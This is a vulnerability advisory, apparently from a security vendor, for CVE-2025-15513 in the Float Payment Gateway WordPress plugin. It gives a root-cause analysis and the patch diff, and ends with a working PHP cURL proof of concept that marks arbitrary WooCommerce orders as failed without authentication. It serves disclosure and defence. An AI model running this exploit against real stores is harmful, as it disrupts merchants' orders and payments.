Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2025-15513: Float Payment Gateway <= 1.1.9 – Improper Authorization to Unauthenticated Order Status Manipulation (float-gateway)

CVE ID CVE-2025-15513
Plugin float-gateway
Severity Medium (CVSS 5.3)
CWE 863
Vulnerable Version 1.1.9
Patched Version 1.1.10
Disclosed January 12, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-15513:
This vulnerability is an improper authorization flaw in the Float Payment Gateway plugin for WordPress, allowing unauthenticated attackers to mark any WooCommerce order as failed. The vulnerability affects all plugin versions up to and including 1.1.9, with a CVSS score of 5.3 (Medium severity).

The root cause is improper error handling and missing authorization checks in the `verifyFloatResponse()` function within `/float-gateway/index.php`. The vulnerable code block (lines 475-485 in version 1.1.9) executed order status updates when a nonce verification check failed (`$nonce_verify_1 !== $nonce_verify_2`). This logic flaw allowed attackers to trigger the failure path by providing mismatched nonce values, bypassing authentication requirements entirely.

Exploitation involves sending a POST request to the WordPress AJAX endpoint (`/wp-admin/admin-ajax.php`) with the `action` parameter set to `float_verify_response`. The attacker must include an `order_id` parameter containing the target WooCommerce order ID. No authentication or valid nonce is required. The plugin processes this request through the `verifyFloatResponse()` function, fails the nonce comparison, and executes the vulnerable order status update code.

The patch in version 1.1.10 removes the vulnerable order status update logic from the nonce verification failure path. The diff shows the complete removal of lines 477-483 from `/float-gateway/index.php`. After patching, a nonce verification failure only results in a JSON response redirecting to the cart checkout URL (`WC()->cart->get_checkout_url()`), without modifying any order status. This fix addresses the improper authorization by eliminating the unauthorized state change operation.

Successful exploitation allows unauthenticated attackers to disrupt WooCommerce store operations by marking arbitrary orders as failed. This can cause customer confusion, financial reconciliation issues, and potential reputational damage. The vulnerability does not allow order creation, payment capture, or data exfiltration, but the unauthorized modification of order status represents a clear integrity violation.

Differential between vulnerable and patched code

Code Diff 
--- a/float-gateway/index.php
+++ b/float-gateway/index.php
@@ -5,7 +5,7 @@
  * Description: Take credit card payments on your store using the Float API.
  * Author: © FLOAT TECHNOLOGIES (PTY) LTD
  * Author URI: http://float.co.za
- * Version: 1.1.9
+ * Version: 1.1.10
  */

 use floatloggerFloatLogger;
@@ -19,7 +19,7 @@
 }


-define('WC_FLOAT_VER', '1.1.9');
+define('WC_FLOAT_VER', '1.1.10');
 define('WC_FLOAT_PLUGIN_PATH', untrailingslashit(plugin_dir_path(__FILE__)));


@@ -475,13 +475,6 @@

 			$json = [];
 			 if ($nonce_verify_1 !== $nonce_verify_2) {
-				if (isset($_POST['order_id'])) {
-					$order = new WC_Order(sanitize_key($_POST['order_id']));
-					if ($order) {
-						$order->update_status('failed', sprintf(__('%s %s failed to verify transaction from Float', 'float-payment-gateway'), get_woocommerce_currency(), $order->get_total()));
-						wp_send_json(['redirect' => $order->get_checkout_payment_url(false)]);
-					}
-				}
 				wp_send_json(['redirect' => WC()->cart->get_checkout_url()], 200);
 			}

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC 
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-15513 - Float Payment Gateway <= 1.1.9 - Improper Authorization to Unauthenticated Order Status Manipulation

<?php

$target_url = 'https://vulnerable-site.com/wp-admin/admin-ajax.php';

// Target WooCommerce order ID to mark as failed
$order_id = 1234;

// Prepare POST data for the vulnerable AJAX action
$post_data = [
    'action' => 'float_verify_response',  // WordPress AJAX hook handled by verifyFloatResponse()
    'order_id' => $order_id,              // The order ID to manipulate
    // No valid nonce required - the exploit triggers the nonce mismatch failure path
    'nonce_verify_1' => 'invalid_value_1',
    'nonce_verify_2' => 'invalid_value_2'
];

// Initialize cURL session
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // For testing only
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); // For testing only

// Execute the request
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

// Check response
if ($http_code === 200) {
    echo "[+] Request successful. Order $order_id may have been marked as failed.n";
    echo "[+] Response: $responsen";
} else {
    echo "[-] Request failed with HTTP code: $http_coden";
}

curl_close($ch);

?>

Frequently Asked Questions

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations

Trusted by Developers
Blac&kMcDonaldCovenant House TorontoAlzheimer Society CanadaUniversity of TorontoHarvard Medical School